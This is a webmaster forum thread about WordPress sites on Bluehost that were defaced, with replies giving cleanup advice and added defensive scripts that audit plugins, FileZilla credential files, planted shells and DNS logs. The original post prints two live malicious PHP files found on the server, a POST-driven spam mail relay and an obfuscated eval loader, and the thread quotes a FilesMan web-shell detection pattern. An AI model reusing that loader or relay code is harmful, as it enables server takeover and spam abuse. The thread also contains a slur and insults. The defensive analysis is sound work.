Sites hacked

shindig

New member
Jul 21, 2012
Seattle, WA
Somehow my domains hosted on bluehost got hacked by some Palestinian faggot.

[attached screenshot: 2e5r2py.jpg]


Some of the sites weren't even public/published, I was working on the one pictured above and just went to show a client and this shit appeared.

Looking in the file directory on bluehost for the domain, I see they slipped an index.html file into the main directory for each of my domains.

I got this email from bluehost:
Dear customer,

This notice is to inform you that we have detected malicious code in your website files. We have compiled a list of compromised files on your account, as well as the code injected, below.

In order to maintain a secure hosting environment, we will be automatically correcting these compromised files on your account; however, please be aware that you are responsible for verifying that the content hosted within your account is secure. We strongly advise that you update your installed scripts and software, as outdated scripts and software are the most frequently used method for accessing and gaining control of a targeted account.

If you need assistance updating the software on your hosting account, please do not hesitate to contact our Support department.


The malicious code detected is similar to:

Files with the following contents or MD5SUMs, which contain malicious code:

\$default_action\s*=\s*['"]FilesMan['"]\s*

My password is ridiculously complex, don't know how anyone would get it...how else would these fuckers add shit to my server? Some of the domains were registered last week...
 


I'd installed wordpress but was just using static pages. I'd disabled all the plugins. Some of the domains affected don't have wordpress installed yet there are a dozen new files added in the directory. Fuck.

This is some random php file:
<?php $HmqenXtApUBX = stripslashes($_POST['OejVxex']); $SFQsFl = stripslashes($_POST['GQrR']); $oabczZQYGw = stripslashes($_POST['bupthoehyRL']); $retu = mail(stripslashes($HmqenXtApUBX), stripslashes($SFQsFl), stripslashes($oabczZQYGw)); if($retu){echo 'dOuAfkhHe';} else {echo 'MdxXEYvzD : '.$XJaIKNNKlBfm;}


<?php
$vMZLYVQ = Array('1'=>'j', '0'=>'v', '3'=>'3', '2'=>'m', '5'=>'P', '4'=>'g', '7'=>'e', '6'=>'E', '9'=>'N', '8'=>'s', 'A'=>'F', 'C'=>'l', 'B'=>'T', 'E'=>'4', 'D'=>'w', 'G'=>'q', 'F'=>'2', 'I'=>'X', 'H'=>'O', 'K'=>'R', 'J'=>'b', 'M'=>'k', 'L'=>'V', 'O'=>'L', 'N'=>'S', 'Q'=>'H', 'P'=>'i', 'S'=>'0', 'R'=>'J', 'U'=>'B', 'T'=>'y', 'W'=>'7', 'V'=>'A', 'Y'=>'c', 'X'=>'d', 'Z'=>'o', 'a'=>'f', 'c'=>'Q', 'b'=>'a', 'e'=>'9', 'd'=>'u', 'g'=>'8', 'f'=>'t', 'i'=>'G', 'h'=>'n', 'k'=>'Y', 'j'=>'r', 'm'=>'5', 'l'=>'1', 'o'=>'x', 'n'=>'W', 'q'=>'h', 'p'=>'K', 's'=>'D', 'r'=>'6', 'u'=>'I', 't'=>'p', 'w'=>'C', 'v'=>'U', 'y'=>'Z', 'x'=>'M', 'z'=>'z');
function vFHEEL1($vJTLD3Z, $vEI3O5N){$vYRM05R = ''; for($i=0; $i < strlen($vJTLD3Z); $i++){$vYRM05R .= isset($vEI3O5N[$vJTLD3Z[$i]]) ? $vEI3O5N[$vJTLD3Z[$i]] : $vJTLD3Z[$i];}
return base64_decode($vYRM05R);}
$vGKDO72 = 'RiAlXiqaYiAzYTVeuwRq9nAPkzCCknkD9B4Tk2RMy1Rqk1YFxskE9n6mx'.
'1kSxTuWw4ZMkFe8J3u45NVPuFK29NuWwPKMynyqXnoSIFA1XiC0JPVeuwXibnoCYSlqJPYWwPKMynyqXnoSI3Lzy'.
'Leqb2AEusS4XQRlyB8pRiKCy2AlJQKakFqqYh9CXwVeuwXIbnmMJ3XzOB6T9B6hHDZpciCdbLezyIcZRFLTY2eTIF'.
'o0yTY8BCLxBwMWwMUtJ2CaYFLSpwX8JFXayIRTJ3RzRTDDpB8pciCdbLezyIcZRFl'.
'q7AeC7iL1XIKtJFmaXiCfyNY8xwMWwMUzyIKaXiCfyLe8bnltXw4DpB8pcQ9CX'.
'AefknXtkleoXneSyI9aYhLdXiCfyN4DpB8pciKCy2CdyN4hLl95IlyAvC9RBSEhOwVhxPElO16hpB8pw2'.
'C2piXCXAefknXtkleoXneSyI9ay3U1pwMtuQ8puwV4uiylJ29SbneduAXBB39'.
'SY2CDYFoqYFqCYT4MkIRTkIMtuQ8puwV4uwV4uwUTyIKlY2E4bI9akIRTkIMZRiAT'.
'Y2AmpNV/uiATY2AmIFlqYw4hLl95Y3KTbIUzJiAzbiLzRTD4RiATY2A'.
'mpNVruQ9SY2CDYFoqYFqCYT4MkIRTkIMtHDZ4uwV4acZ4uwV4RAecBl9vusS4Ll9'.
'5Y3KTbIUzJiAzbiLzpwKav6eBLwMWwPV4uwVMIS95BSfRKNVeuAXBB39SY2CDYFoqYFqCYT4M'.
'IS95BSfRKNMWwhSpw2ylJ29SbneduQXzJSo0yFCdpwM47DZ4uw'.
'V4biLqyiLTpwXuLAKcOz6dxwVSxsc4B2eSu6y0XnmMRTMWwPV4uwUMbnvZu1cD9wutHDtew4t2Xnm1XiC0JPUIvSezyIK1JF'.
'ejbnvZRi88uwKFpNUWwPV4uwVMIS95BSfRKL8MblS45NVMX18puwV4uQ9CX'.
'i90JFftyN4MbTD4RQktHDtew4ttyP4qynlDXQMZRiAlXiqaYiAzYTMtuQ8puwV4uiC2piCzYFLSpwKav6eBLA8hY'.
'iAzYTXXpNV2RPVZJnclpwKav6eBLA8hYiAzYTXXpNVe5NVMkILSbAeDkI9zpNMpuwV4uwV4uwUIvSezyIK1JFejbn'.
'vZJnclpwKavSLNLMLNnTXuLAKcISq5vlchINM8uwKqXIKZI3UqY3xtHDZpuwV4uiC2uw4qbI9zyIc'.
'ZRAesBSeONvLJJnclpwKavSLNLMLNnTXuLAKcISq5vlchINCXpNUgawVZRAesBSeONvLJJnclpwKavSLNLML'.
'NnTXuLAKcISq5vlchINCXuw6euwKqXIKZI3UqY3xtpcZ4uwV4uwV4uQXz'.
'JSo0yFCdpwMWwhSpw2ylJ29SbneduiA1XiC0JCRspwM47DZ4uwV4bnkZuvVMIlU5vlKJR3VoRlStuQ8puwV4uwV4uw'.
'VMkNVeuiATY2AmpVZ4uwV4uwV4uwV4uwVPXnmqJnvPusS+uQUZYAelJ2AfyN4tOVZ4'.
'uwV4uwV4uwV4uwVPYiqDI3yCYh9tJFEPusS+uQUZYQyCYh9tJFEZpNDpuwV4uwV4uwV4uwV4uhXzJleFyIRzbneduPVe5P'.
'UIvSeaLMLNvSC5BPDpuwV4uwV4uwV4uwV4uh9qy2LfJFKCuPVe5PUVbnmtIFXCXw4hYF'.
'A2yLefJFKCRTMpuwV4uwV4uwVtHDZ4uwV4uwV4uiL1big4YFLTbnA8bItCpwKqpB8puwV4u'.
'QS4ynozyNUWwPV4uwV4uwV4yIyqJw4MIlU5vlKJR3VoRlStHDZ4uwV4actew2C2pwUCJIUS7N4MIlU5vlKJRF6h'.
'INM4pcZ4uwV4bnkZbI9zyIcZRiKCy2AlJQKakn9SbnedpNV2RPU2Xnm1XiC0JCeC7iCzXQxZ'.
'RFA1XiC0JPY4OPVMyiL2kIL8XAeqk3KtJFEtpcZ4uwV4uwV4uwKav6eBLA8hkNXX'.
'usS4RiKCy2AlJQKakn9SbnedHDZ4uwV4ynozycZ4uwV4uwV4uwKav6eBLA8hkNXXusS4Rl9CkSCdy2ghHDttyP44unLfYQKmpwKa'.
'v6eBLA8hkNXXpNV2RPU2Xnm1XiC0JCeC7iCzXQxZRFA1XiC0JPY4OPVMIlU5vlKJRF6hINM4pcZ4uwV4kFA8JAelYFLTIFylJ2xZ'.
'RFA1XiC0JPY4OPVMIlU5vlKJRF6hINMWw2LEbIcW';
eval(vFHEEL1($vGKDO72, $vMZLYVQ));?>

Even added php.ini files.
 

Your usernames were left as 'admin'?
 
Well the hacker does have a point. Palestine needs to be freed from the occupation.
 
Hacker uploaded shell through one of your public WP sites and therefore had access to ALL files hosted on that cPanel account (including all of your other sites, as all of the site files are bunched up into the same cPanel account).

There are likely a few shells hidden in random directories and you'll have to:
- Find out how the hacker uploaded their shell and fix that
- Search and delete all remaining shells

GL bro
 
MY host has two usernames/log ins, one is the admin to go to the admin, the other one is to log into wordpress, sorry to hear that man.
 
Also make sure you create a custom 404 page if you didn't have one, since the standard 404 with almost every host gives a hacker all the information he/she needs to bruteforce your server.
 
Most likely the shell was uploaded through a SQLi vuln with a plugin like others said, if you check Exploit-DB there's tons of WP vulns floating around, make sure you stay up to date on public exploits and make sure you don't use any of the trash plugins you see on those sites. They also probably found your site by google dorking certain phrases to find troves of vuln sites just like yours, unless you've made enemies it most likely wasn't a commissioned attack.

But honestly security is an illusion, nothing will ever be 100%, especially so when you have to ask gay webmasters how somebody can get into your server when you have a strong password..My advice to you proceeding on is to firstly find and eliminate the shell(s) on your host, and secondly read a bit about networking and security and keep up to date with modern exploits. Knowledge is half the battle. If you're banking online the least you can do is learn how to protect your assets.
 
[..] I'd disabled all the plugins. [..]

Just because a plugin is disabled within your Wordpress backend, doesn't mean it cannot be run by someone. People think "disabling" it within Wordpress means disabling its ability to run - that's incorrect. Unless you have removed execution using chmod, I can manually go to http://www.YourSite.com/wp-content/plugins/old-ass-disabled-plugin/file1234.php and run it manually or post directly to it. You have to make sure even your disabled plugins are up to date, or just completely delete them from within your plugin folder.

If a file is on your server, in the public_html directory, and has the chmod command to be executed, it can be executed - period.
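The point above is that a plugin directory that still exists under wp-content/plugins is reachable whether or not WordPress lists it as active. The following added example (not code from the thread or from WordPress) shows one way to find those leftovers: it parses the `active_plugins` value from the wp_options table, which WordPress stores as a PHP-serialized array of `dir/file.php` strings, and diffs it against the directories actually present. It assumes you have pulled the option value out of the database yourself (phpMyAdmin, WP-CLI or similar); the sample value and directory list are constructed.

```python
import os
import re

# Constructed sample of the wp_options 'active_plugins' value. WordPress
# serializes it with PHP's serialize(): a:<count>:{i:<idx>;s:<len>:"<value>";...}
SAMPLE_ACTIVE_PLUGINS = (
    'a:2:{i:0;s:19:"akismet/akismet.php";'
    'i:1;s:36:"contact-form-7/wp-contact-form-7.php";}'
)

# Constructed listing of wp-content/plugins; 'old-ass-disabled-plugin' is the
# kind of leftover the post above is talking about.
SAMPLE_PLUGIN_DIRS = ["akismet", "contact-form-7", "old-ass-disabled-plugin"]


def parse_active_plugins(serialized):
    """Parse a flat PHP-serialized array of strings into a Python list.

    Only the shape WordPress uses for active_plugins is handled (integer keys,
    string values). s:<len> counts bytes, so the parse runs over bytes.
    """
    data = serialized.encode("utf-8")
    head = re.match(rb"a:(\d+):\{", data)
    if not head:
        raise ValueError("not a PHP-serialized array")
    pos = head.end()
    items = []
    element = re.compile(rb'i:\d+;s:(\d+):"')
    for _ in range(int(head.group(1))):
        m = element.match(data, pos)
        if not m:
            raise ValueError(f"malformed element at offset {pos}")
        length = int(m.group(1))
        start = m.end()
        value = data[start:start + length]
        if data[start + length:start + length + 2] != b'";':
            raise ValueError(f"declared length does not match value at offset {start}")
        items.append(value.decode("utf-8"))
        pos = start + length + 2
    if data[pos:pos + 1] != b"}":
        raise ValueError("missing closing brace")
    return items


def list_plugin_dirs(wp_content):
    """Directory names under wp-content/plugins (single-file plugins and the
    index.php placeholder are not directories and are skipped)."""
    plugins = os.path.join(wp_content, "plugins")
    return sorted(
        d for d in os.listdir(plugins) if os.path.isdir(os.path.join(plugins, d))
    )


def inactive_plugin_dirs(plugin_dirs, active_plugins):
    """Plugin directories present on disk that no active plugin lives in.

    Each active entry is 'dir/main-file.php'; the part before the slash is the
    directory WordPress loads it from.
    """
    active_dirs = {entry.split("/", 1)[0] for entry in active_plugins}
    return sorted(d for d in plugin_dirs if d not in active_dirs)


if __name__ == "__main__":
    active = parse_active_plugins(SAMPLE_ACTIVE_PLUGINS)
    # On a real install: inactive_plugin_dirs(list_plugin_dirs("/path/to/wp-content"), active)
    for leftover in inactive_plugin_dirs(SAMPLE_PLUGIN_DIRS, active):
        print("inactive but still on disk:", leftover)
```

Anything the script reports is code that is still reachable over HTTP but receives no updates through the dashboard; either update it deliberately or remove the directory. Plugins that are active but outdated are a separate problem that this check does not cover.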
 
Keep your damn installations up to date...

Or move to real static sites.

Also, put in a good security plug in. I use several on different sites to avoid footprints... But there are plenty of good ones out there.
 
If it's just the core WP files that are affected you can export the posts in WP settings and reimport to a brand new installation. Then transfer the theme/plugins over in a zip if it's clean - would be better to just change the theme and avoid the plugins. Or at least do that on the sites you don't really care about.
 
Do you use Filezilla? Have you checked your work computer for a virus? Filezilla stores FTP usernames and passwords in plaintext and it's a popular target for viruses. The bots get the bookmark file from Filezilla and then access your sites on your server.
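The "bookmark file" referred to above is FileZilla's sitemanager.xml (by default `%APPDATA%\FileZilla\sitemanager.xml` on Windows and `~/.config/filezilla/sitemanager.xml` on Linux and macOS). As an added example, not code from the thread or from the FileZilla project, the script below audits that file and lists which saved sites carry a stored password, so you know which FTP accounts to rotate if the workstation is suspect. The sample XML is constructed; it assumes the `<Pass>` element holds the password either bare or with `encoding="base64"` (base64 is only an encoding, not encryption) and that `<Logontype>` 1 means "Normal" (password saved) while 2 means "Ask for password". The script never prints the passwords themselves.

```python
import os
import sys
import xml.etree.ElementTree as ET

# Constructed sitemanager.xml with three saved sites: one plaintext password,
# one base64-encoded password, one configured to ask for the password.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.5.3" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.com</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>client-one</User>
      <Pass>hunter2</Pass>
      <Logontype>1</Logontype>
      <Name>client one</Name>
    </Server>
    <Server>
      <Host>sftp.example.net</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">c2VjcmV0</Pass>
      <Logontype>1</Logontype>
      <Name>deploy host</Name>
    </Server>
    <Server>
      <Host>ftp.example.org</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>asker</User>
      <Logontype>2</Logontype>
      <Name>ask each time</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def default_sitemanager_paths():
    """Known default locations of sitemanager.xml on the current platform."""
    if sys.platform.startswith("win"):
        return [os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "sitemanager.xml")]
    return [os.path.expanduser("~/.config/filezilla/sitemanager.xml")]


def audit_sitemanager(xml_text):
    """One record per saved site: whether a password is stored and how."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        stored = pass_el is not None and bool((pass_el.text or "").strip())
        findings.append({
            "name": (server.findtext("Name") or "").strip(),
            "host": (server.findtext("Host") or "").strip(),
            "user": (server.findtext("User") or "").strip(),
            "logontype": (server.findtext("Logontype") or "").strip(),
            "password_stored": stored,
            # "plain" means the text is the password itself; "base64" is a
            # trivially reversible encoding, not protection.
            "encoding": pass_el.get("encoding", "plain") if stored else None,
        })
    return findings


def stored_password_entries(findings):
    """The accounts that would be exposed by a copy of this file."""
    return [f for f in findings if f["password_stored"]]


if __name__ == "__main__":
    for path in default_sitemanager_paths():
        if os.path.exists(path):
            with open(path, encoding="utf-8") as fh:
                findings = audit_sitemanager(fh.read())
            break
    else:
        findings = audit_sitemanager(SAMPLE_SITEMANAGER)  # fall back to the sample
    for f in stored_password_entries(findings):
        print(f"{f['name']}: {f['user']}@{f['host']} stores a {f['encoding']} password")
```

Every host the script lists should be treated as exposed if the workstation was infected: change those FTP passwords at the host and, where the client supports it, switch the entries to "Ask for password" so nothing sits in the file.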
 
You really need to research this or you will never be rid of it. If you miss even one file you're still going to have problems. Start digging. Find out everything you can about this malware. There are always tracks left behind. Find them and remove them.
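Both the "search and delete all remaining shells" advice earlier in the thread and the "if you miss even one file" warning above come down to sweeping the whole account for the same kind of file. The script below is an added example, not code from the thread, from Bluehost or from any scanner product. It walks a web root and flags files matching the FilesMan regex Bluehost quoted in the OP's notice, small files that read request input and call mail() (the shape of the OP's first snippet), eval() of a home-grown decoder applied to a blob and a substitution map (the shape of the OP's second snippet), the common eval(base64_decode(...)) family, and stray php.ini files, which the OP also found. The sample tree it builds is constructed; the rule names are mine.

```python
import os
import re
import tempfile

# Signature rules. The FilesMan one is the regex Bluehost quoted in the OP's
# notice; the next two are modelled on the two PHP files the OP posted; the
# eval/base64 rule is a generic addition.
RE_FILESMAN = re.compile(r"""\$default_action\s*=\s*['"]FilesMan['"]""")
RE_REQUEST_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST)\s*\[")
RE_MAIL_CALL = re.compile(r"\bmail\s*\(")
RE_EVAL_DECODER = re.compile(r"\beval\s*\(\s*\w+\s*\(\s*\$\w+\s*,\s*\$\w+\s*\)\s*\)")
RE_EVAL_ENCODED = re.compile(r"\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(")

# Only files this small get the mail-relay rule; legitimate contact-form code
# also reads $_POST and calls mail(), but is far larger than a dropped relay.
MAIL_RELAY_MAX_CHARS = 4096
WEB_EXTENSIONS = {".php", ".phtml", ".php5", ".inc", ".html", ".htm"}
MAX_FILE_BYTES = 2 * 1024 * 1024


def scan_text(text):
    """Names of the rules a file body triggers (empty list if clean)."""
    hits = []
    if RE_FILESMAN.search(text):
        hits.append("filesman_shell")
    if (len(text) <= MAIL_RELAY_MAX_CHARS
            and RE_MAIL_CALL.search(text) and RE_REQUEST_INPUT.search(text)):
        hits.append("request_driven_mail")
    if RE_EVAL_DECODER.search(text):
        hits.append("eval_custom_decoder")
    if RE_EVAL_ENCODED.search(text):
        hits.append("eval_encoded_payload")
    return hits


def scan_tree(root):
    """Map of path (relative to root) -> rule hits for every flagged file."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            hits = []
            if fn == "php.ini":
                hits.append("stray_php_ini")  # the OP found these dropped in too
            ext = os.path.splitext(fn)[1].lower()
            if ext in WEB_EXTENSIONS and os.path.getsize(path) <= MAX_FILE_BYTES:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    hits.extend(scan_text(fh.read()))
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


# Constructed sample tree: four planted files plus one clean index.php that
# calls mail() with fixed arguments and must not be flagged.
SAMPLE_FILES = {
    "wp-content/uploads/cache.php": "<?php $auth_pass = ''; $default_action = 'FilesMan'; ?>",
    "mailer.php": "<?php $a = stripslashes($_POST['x']); $b = stripslashes($_POST['y']); "
                  "mail($a, $b, 'z'); ?>",
    "wp-includes/img.php": "<?php $m = Array('1'=>'j'); function d($s,$k){return base64_decode($s);} "
                           "$p = 'abc'; eval(d($p, $m)); ?>",
    "php.ini": "disable_functions =\n",
    "index.php": "<?php echo 'hello'; mail('me@example.com', 'subject', 'body'); ?>",
}


def demo():
    """Write the constructed tree to a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    # Real use: scan_tree("/home/<cpanel-user>/public_html")
    for rel, hits in sorted(demo().items()):
        print(f"{rel}: {', '.join(hits)}")
```

Treat the output as a triage list, not a verdict: read each hit before deleting, compare flagged files against a fresh copy of WordPress or the plugin, and remember that a clean sweep only matters once the upload path itself is closed.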
 
lol at tag. agree with dmnEPC, it's a pain in the balls making sure they're gone.

the best solution I came up with was log all outbound DNS queries. your server is most useful as part of a botnet, so if they still have access, they'll be using your server to bruteforce other sites or whatever. your site shouldn't be using much outbound DNS anyway, so it should show up in logs.
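The suggestion above works because a web server normally resolves only a handful of names (its update sources, an SMTP relay), while a box being used against other sites resolves many different ones in a short time. As an added example, not code from the thread, the script below parses resolver query-log lines, subtracts an allowlist of names the server is expected to look up, and reports both the most frequent unexpected names and any minute in which many distinct unexpected names were resolved. The log lines are constructed in a BIND-style "client IP#port: query: NAME IN TYPE" layout; the regex is the thing to adapt to whatever resolver you actually log from, and the allowlist is a placeholder you fill with your own expected destinations.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed query-log lines: two expected lookups, then a one-minute burst
# of lookups for six different sites, then another expected lookup.
SAMPLE_LOG = """\
21-Jul-2012 10:15:02.101 client 203.0.113.10#40211: query: api.wordpress.org IN A +
21-Jul-2012 10:15:03.455 client 203.0.113.10#40212: query: downloads.wordpress.org IN A +
21-Jul-2012 10:16:10.002 client 203.0.113.10#40300: query: shop-one.example IN A +
21-Jul-2012 10:16:10.150 client 203.0.113.10#40301: query: blog-two.example IN A +
21-Jul-2012 10:16:10.301 client 203.0.113.10#40302: query: forum-three.example IN A +
21-Jul-2012 10:16:10.470 client 203.0.113.10#40303: query: store-four.example IN A +
21-Jul-2012 10:16:10.611 client 203.0.113.10#40304: query: news-five.example IN A +
21-Jul-2012 10:16:10.790 client 203.0.113.10#40305: query: cms-six.example IN A +
21-Jul-2012 10:16:11.003 client 203.0.113.10#40306: query: shop-one.example IN A +
21-Jul-2012 10:17:45.100 client 203.0.113.10#40400: query: api.wordpress.org IN A +
"""

# Adapt to the resolver's real format; this matches the constructed lines above.
QUERY_RE = re.compile(
    r"^(?P<ts>\S+ \S+) client (?P<client>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<qtype>\S+)"
)

# Placeholder allowlist: names this server is expected to resolve.
EXPECTED_NAMES = {"api.wordpress.org", "downloads.wordpress.org"}


def parse_queries(text):
    """(timestamp, client, name, qtype) for every line that matches QUERY_RE."""
    records = []
    for line in text.splitlines():
        m = QUERY_RE.match(line)
        if not m:
            continue  # unrelated log line
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f")
        records.append((ts, m["client"], m["name"].lower().rstrip("."), m["qtype"]))
    return records


def unexpected_queries(records, expected=EXPECTED_NAMES):
    """Names outside the allowlist, most frequent first."""
    counts = Counter(name for _, _, name, _ in records if name not in expected)
    return counts.most_common()


def lookup_bursts(records, expected=EXPECTED_NAMES, threshold=5):
    """Minutes in which at least `threshold` distinct unexpected names were
    resolved: the footprint of one host touching many other sites."""
    per_minute = defaultdict(set)
    for ts, _, name, _ in records:
        if name not in expected:
            per_minute[ts.replace(second=0, microsecond=0)].add(name)
    return [(minute, sorted(names)) for minute, names in sorted(per_minute.items())
            if len(names) >= threshold]


if __name__ == "__main__":
    recs = parse_queries(SAMPLE_LOG)
    for name, n in unexpected_queries(recs):
        print(f"{n:4d}  {name}")
    for minute, names in lookup_bursts(recs):
        print(f"burst at {minute:%H:%M}: {len(names)} distinct names, e.g. {names[:3]}")
```

Run it over a day of logs once the allowlist reflects the server's normal traffic; a burst from the web server's own address is the signal, and the client column tells you which host on a shared box is responsible.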
 
Happened to me too on bluehost. Had 6 wordpress pages hacked. It wasn't this same guy, it was some spammer who made a bunch of phantom posts on each site with random spam and links with them. They are phantom because they don't exist in my WP admin panel to be deleted. He somehow injected them into the DBs and now they show up.

Google marked my site as "hacked" in the SERPS. This is going to be a pain to fix. urgh